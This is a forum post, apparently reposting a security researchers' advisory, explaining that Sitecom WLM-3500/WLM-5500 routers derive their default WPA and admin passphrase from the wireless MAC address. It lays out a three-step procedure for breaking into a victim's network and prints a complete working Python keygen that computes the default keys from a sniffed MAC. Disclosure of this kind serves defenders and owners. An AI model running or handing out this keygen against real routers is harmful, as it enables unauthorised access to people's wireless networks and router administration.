Sitecom WLM-3500 and WLM-5501 WPS Keygen 1

Affected Sitecom devices are shipped with a 8-letter WPA/WPA2 passphase, printed on a stick attached

Watchers:
This resource is being watched by 31 members.
  1. Mr. Penguin
    Affected Sitecom devices are shipped with a 8-letter WPA/WPA2 passphase, printed on a stick attached under the device. The very same passphrase can be also used to authenticate to the router web interface, with administrative privileges. At a first glance, this key seems just like a random sequence of eight lowercase and uppercase letters. However, our analysis revealed that this 8-letter key is not random at all, as it can be generated from publicly-accessible information, namely the MAC address of the wireless interface card.

    [xtable=bcenter]
    {tbody}
    {tr}
    {td}Login or Signup to view links / downloads{/td}
    {/tr}
    {tr}
    {td}Generating the WPA/admin passphrase from publicly-accessible information{/td}
    {/tr}
    {/tbody}
    [/xtable]
    Login or Signup to view links / downloads
    This kind of issue is not new: in the past several other device models were shown to derive the wireless passphrase from the MAC address and/or the Wi-Fi SSID (e.g., Login or Signup to view links / downloads, Login or Signup to view links / downloads and many others). To the best of our knowledge, this is the first time Sitecom devices are also proved to be vulnerable.

    More in detail, attackers can connect to a vulnerable Sitecom Wi-Fi network through a simple 3-step procedure:
    1. Move inside the wireless network range and intercept the router Wi-Fi MAC address.
    2. Apply the Sitecom key generation algorithm. This algorithm, starting from the Wi-Fi MAC address, generates the default WPA passphrase.
    3. The generated WPA key can be used to access the victim's wireless network, unless the user has changed it configuring a different Wi-Fi passphrase.
    Of course, the challenge for the attacker is to determine which algorithm was used to generate the WPA key starting from the Wi-Fi MAC address. In the case of the affected Sitecom routers, the key generation algorithm was included right inside the device firmware, and was used during a "factory reset" procedure to re-generate the default WPA passphrase.

    To demonstrate this attack, we reconstructed the WPA key generation algorithm and implemented it in a Python script, available Login or Signup to view links / downloads. Usage is very simple: just invoke the script passing the MAC address of the target Wi-Fi network, as shown in the example below. The script outputs both the key for the WLM-3500 and the two passphrases for the dual-band WLM-5500.

    Code:
    Select All
    # # Sitecom N300/N600 default WPA/admin key calculator # ================================================== # # Authors: # Roberto Paleari (roberto.paleari@emaze.net, @rpaleari) # Alessandro Di Pinto (alessandro.dipinto@emaze.net, @adipinto) # import string import sys CHARSET = "123456789abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ" def increment_hex(hexchar): hexchar = hexchar.upper() assert hexchar in string.hexdigits return string.hexdigits[(string.hexdigits.find(hexchar)+1) % len(string.hexdigits)] def mangle_key(mac, op1, op2): def LO(v): return v & 0xffffffff def HI(v): return (v >> 32) & 0xffffffff a0 = LO(op1 * op2) v0 = HI(a0 * 0x94f2095) v1 = v0 >> 1 v0 = a0 >> 31 v1 = v1 - v0 v0 = v1 v0 = LO(v0 << 3) - v1 v0 = LO(v0 << 3) - v1 v0 = a0 - v0 return CHARSET[v0] def calculate_key(mac): key = [0]*8 secondhalf = "0" for c in mac[6:]: if c.isdigit(): secondhalf += c else: break secondhalf = int(secondhalf) mac = [ord(x) for x in mac] opmap = [ (mac[11] + mac[5] + secondhalf, mac[9] + mac[11] + mac[3]), (mac[11] + mac[6] + secondhalf, mac[8] + mac[11] + mac[10]), (mac[3] + mac[5] + secondhalf, mac[7] + mac[11] + mac[9]), (mac[11] + mac[4] + mac[5], mac[6] + mac[7] + secondhalf), (mac[6] + mac[7] + secondhalf, mac[8] + mac[11] + mac[9]), (mac[11] + mac[3] + mac[4], mac[5] + mac[11] + secondhalf), (mac[11] + mac[6] + mac[8], mac[4] + mac[11] + secondhalf), (mac[11] + mac[7] + mac[8], mac[10] + mac[11] + secondhalf), ] for i in range(8): op1, op2 = opmap[i] key[i] = mangle_key(mac, op1, op2) return "".join(key) def main(): if len(sys.argv) != 2: print >> sys.stderr, "[!] Syntax: python %s <MAC address>" % sys.argv[0] exit(0) mac = sys.argv[1] if ":" in mac: mac = mac.replace(":", "") seed = mac.upper() print "==== Single-band (N300/WLM-3500) ====" key = calculate_key(seed) print "KEY 2.4GHz:", key print print "==== Dual-band (N600/WLM-5500) ====" last = seed[-1] for i in range(2): last = increment_hex(last) key = calculate_key(seed[:-1] + last) if i == 0: print "KEY 5GHz: ", key else: print "KEY 2.4GHz:", key if __name__ == "__main__": main()